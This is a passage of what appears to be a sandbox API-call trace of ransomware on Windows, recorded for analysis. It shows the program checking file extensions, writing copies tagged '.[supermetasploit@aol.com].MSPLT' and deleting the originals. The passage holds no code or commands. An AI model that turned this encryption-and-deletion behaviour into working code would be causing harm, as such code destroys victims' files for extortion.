(lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml")) returned 0x80 [0172.833] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.833] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0172.833] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.833] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.833] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0172.898] GetLastError () returned 0x0 [0172.898] ReadFile (in: hFile=0x344, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x9882, lpOverlapped=0x0) returned 1 [0172.912] WriteFile (in: hFile=0x358, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x9890, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x9890, lpOverlapped=0x0) returned 1 [0172.914] ReadFile (in: hFile=0x344, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0172.914] WriteFile (in: hFile=0x358, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xe8, lpOverlapped=0x0) returned 1 [0172.914] SetEndOfFile (hFile=0x358) returned 1 [0172.914] CloseHandle (hObject=0x358) returned 1 [0172.922] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.922] SetEndOfFile (hFile=0x344) returned 1 [0172.924] CloseHandle (hObject=0x344) returned 1 [0172.924] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.924] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml")) returned 1 [0172.924] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0172.924] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0172.925] lstrlenW (lpString=".doc") returned 4 [0172.925] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0172.925] lstrlenW (lpString=".docx") returned 5 [0172.925] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0172.925] lstrlenW (lpString=".pdf") returned 4 [0172.925] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0172.925] lstrlenW (lpString=".xls") returned 4 [0172.925] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0172.925] lstrlenW (lpString=".xlsx") returned 5 [0172.925] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0172.925] lstrlenW (lpString=".ppt") returned 4 [0172.925] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0172.925] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0172.925] lstrlenW (lpString=".zip") returned 4 [0172.925] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0172.925] lstrlenW (lpString=".rar") returned 4 [0172.925] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0172.925] lstrlenW (lpString=".bz2") returned 4 [0172.925] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0172.925] lstrlenW (lpString=".7z") returned 3 [0172.925] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0172.925] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0172.925] lstrlenW (lpString=".dbf") returned 4 [0172.925] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0172.925] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0172.925] lstrlenW (lpString=".1cd") returned 4 [0172.925] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0172.925] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0172.925] lstrlenW (lpString=".jpg") returned 4 [0172.926] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0172.926] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0172.926] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0172.926] lstrlenW (lpString=".doc") returned 4 [0172.926] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0172.926] lstrlenW (lpString=".docx") returned 5 [0172.926] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0172.926] lstrlenW (lpString=".pdf") returned 4 [0172.926] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0172.926] lstrlenW (lpString=".xls") returned 4 [0172.926] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0172.926] lstrlenW (lpString=".xlsx") returned 5 [0172.926] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0172.926] lstrlenW (lpString=".ppt") returned 4 [0172.926] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0172.926] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0172.926] lstrlenW (lpString=".zip") returned 4 [0172.926] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0172.926] lstrlenW (lpString=".rar") returned 4 [0172.926] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0172.926] lstrlenW (lpString=".bz2") returned 4 [0172.926] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0172.926] lstrlenW (lpString=".7z") returned 3 [0172.926] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0172.927] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0172.927] lstrlenW (lpString=".dbf") returned 4 [0172.927] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0172.927] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0172.927] lstrlenW (lpString=".1cd") returned 4 [0172.927] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0172.927] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 39 [0172.927] lstrlenW (lpString=".jpg") returned 4 [0172.927] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0172.927] lstrcmpiW (lpString1=".bmp", lpString2=".MSPLT") returned -1 [0172.927] lstrlenW (lpString="SplashScreen.bmp") returned 16 [0172.927] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0172.929] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=41080) returned 1 [0172.929] CloseHandle (hObject=0x344) returned 1 [0172.929] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp")) returned 0x80 [0172.930] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.930] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0172.930] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.930] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.930] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0172.931] GetLastError () returned 0x0 [0172.931] ReadFile (in: hFile=0x344, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0xa078, lpOverlapped=0x0) returned 1 [0172.976] WriteFile (in: hFile=0x358, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xa080, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xa080, lpOverlapped=0x0) returned 1 [0172.978] ReadFile (in: hFile=0x344, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0172.978] WriteFile (in: hFile=0x358, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xf4, lpOverlapped=0x0) returned 1 [0172.979] SetEndOfFile (hFile=0x358) returned 1 [0172.979] CloseHandle (hObject=0x358) returned 1 [0172.981] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.981] SetEndOfFile (hFile=0x344) returned 1 [0172.982] CloseHandle (hObject=0x344) returned 1 [0172.983] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.983] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp")) returned 1 [0172.983] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0172.983] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0172.983] lstrlenW (lpString=".doc") returned 4 [0172.983] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0172.983] lstrlenW (lpString=".docx") returned 5 [0172.983] lstrcmpiW (lpString1=".docx", lpString2="n.bmp") returned -1 [0172.984] lstrlenW (lpString=".pdf") returned 4 [0172.984] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0172.984] lstrlenW (lpString=".xls") returned 4 [0172.984] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0172.984] lstrlenW (lpString=".xlsx") returned 5 [0172.984] lstrcmpiW (lpString1=".xlsx", lpString2="n.bmp") returned -1 [0172.984] lstrlenW (lpString=".ppt") returned 4 [0172.984] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0172.984] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0172.984] lstrlenW (lpString=".zip") returned 4 [0172.984] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0172.984] lstrlenW (lpString=".rar") returned 4 [0172.984] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0172.984] lstrlenW (lpString=".bz2") returned 4 [0172.984] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0172.984] lstrlenW (lpString=".7z") returned 3 [0172.984] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0172.984] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0172.984] lstrlenW (lpString=".dbf") returned 4 [0172.984] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0172.984] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0172.984] lstrlenW (lpString=".1cd") returned 4 [0172.984] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0172.984] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0172.984] lstrlenW (lpString=".jpg") returned 4 [0172.984] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0172.985] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0172.985] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0172.985] lstrlenW (lpString=".doc") returned 4 [0172.985] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0172.985] lstrlenW (lpString=".docx") returned 5 [0172.985] lstrcmpiW (lpString1=".docx", lpString2="n.bmp") returned -1 [0172.985] lstrlenW (lpString=".pdf") returned 4 [0172.985] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0172.985] lstrlenW (lpString=".xls") returned 4 [0172.985] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0172.985] lstrlenW (lpString=".xlsx") returned 5 [0172.985] lstrcmpiW (lpString1=".xlsx", lpString2="n.bmp") returned -1 [0172.985] lstrlenW (lpString=".ppt") returned 4 [0172.985] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0172.985] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0172.985] lstrlenW (lpString=".zip") returned 4 [0172.985] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0172.985] lstrlenW (lpString=".rar") returned 4 [0172.985] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0172.985] lstrlenW (lpString=".bz2") returned 4 [0172.985] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0172.985] lstrlenW (lpString=".7z") returned 3 [0172.985] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0172.985] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0172.985] lstrlenW (lpString=".dbf") returned 4 [0172.985] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0172.985] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0172.986] lstrlenW (lpString=".1cd") returned 4 [0172.986] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0172.986] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0172.986] lstrlenW (lpString=".jpg") returned 4 [0172.986] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0172.986] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0172.986] lstrlenW (lpString="UiInfo.xml") returned 10 [0172.986] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0172.986] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=38898) returned 1 [0172.986] CloseHandle (hObject=0x344) returned 1 [0172.986] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml")) returned 0x80 [0172.987] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.987] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0172.987] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.987] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.987] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0172.987] GetLastError () returned 0x0 [0172.987] ReadFile (in: hFile=0x344, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x97f2, lpOverlapped=0x0) returned 1 [0173.907] WriteFile (in: hFile=0x358, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x9800, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x9800, lpOverlapped=0x0) returned 1 [0173.909] ReadFile (in: hFile=0x344, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0173.909] WriteFile (in: hFile=0x358, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xe8, lpOverlapped=0x0) returned 1 [0173.909] SetEndOfFile (hFile=0x358) returned 1 [0173.909] CloseHandle (hObject=0x358) returned 1 [0173.924] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.925] SetEndOfFile (hFile=0x344) returned 1 [0173.926] CloseHandle (hObject=0x344) returned 1 [0173.926] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0173.927] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml")) returned 1 [0173.927] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0173.927] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0173.927] lstrlenW (lpString=".doc") returned 4 [0173.927] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0173.927] lstrlenW (lpString=".docx") returned 5 [0173.927] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0173.927] lstrlenW (lpString=".pdf") returned 4 [0173.927] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0173.927] lstrlenW (lpString=".xls") returned 4 [0173.927] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0173.927] lstrlenW (lpString=".xlsx") returned 5 [0173.927] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0173.927] lstrlenW (lpString=".ppt") returned 4 [0173.927] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0173.927] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0173.928] lstrlenW (lpString=".zip") returned 4 [0173.928] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0173.928] lstrlenW (lpString=".rar") returned 4 [0173.928] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0173.928] lstrlenW (lpString=".bz2") returned 4 [0173.928] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0173.928] lstrlenW (lpString=".7z") returned 3 [0173.928] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0173.928] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0173.928] lstrlenW (lpString=".dbf") returned 4 [0173.928] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0173.928] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0173.928] lstrlenW (lpString=".1cd") returned 4 [0173.928] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0173.928] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0173.928] lstrlenW (lpString=".jpg") returned 4 [0173.928] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0173.928] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0173.928] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0173.928] lstrlenW (lpString=".doc") returned 4 [0173.928] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0173.928] lstrlenW (lpString=".docx") returned 5 [0173.928] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0173.928] lstrlenW (lpString=".pdf") returned 4 [0173.928] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0173.928] lstrlenW (lpString=".xls") returned 4 [0173.929] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0173.929] lstrlenW (lpString=".xlsx") returned 5 [0173.929] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0173.929] lstrlenW (lpString=".ppt") returned 4 [0173.929] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0173.929] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0173.929] lstrlenW (lpString=".zip") returned 4 [0173.929] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0173.929] lstrlenW (lpString=".rar") returned 4 [0173.929] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0173.929] lstrlenW (lpString=".bz2") returned 4 [0173.929] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0173.929] lstrlenW (lpString=".7z") returned 3 [0173.929] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0173.929] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0173.929] lstrlenW (lpString=".dbf") returned 4 [0173.929] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0173.929] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0173.929] lstrlenW (lpString=".1cd") returned 4 [0173.929] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0173.929] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0173.929] lstrlenW (lpString=".jpg") returned 4 [0173.929] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0173.929] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0173.930] lstrlenW (lpString="keypadbase.xml") returned 14 [0173.930] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0174.068] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=903) returned 1 [0174.068] CloseHandle (hObject=0x344) returned 1 [0174.068] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml")) returned 0x20 [0174.068] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.068] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.068] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0174.068] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0174.068] lstrlenW (lpString=".doc") returned 4 [0174.068] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0174.068] lstrlenW (lpString=".docx") returned 5 [0174.068] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0174.068] lstrlenW (lpString=".pdf") returned 4 [0174.069] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0174.069] lstrlenW (lpString=".xls") returned 4 [0174.069] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0174.069] lstrlenW (lpString=".xlsx") returned 5 [0174.069] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0174.069] lstrlenW (lpString=".ppt") returned 4 [0174.069] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0174.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0174.069] lstrlenW (lpString=".zip") returned 4 [0174.069] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0174.069] lstrlenW (lpString=".rar") returned 4 [0174.069] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0174.069] lstrlenW (lpString=".bz2") returned 4 [0174.069] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0174.069] lstrlenW (lpString=".7z") returned 3 [0174.069] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0174.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0174.069] lstrlenW (lpString=".dbf") returned 4 [0174.069] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0174.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft 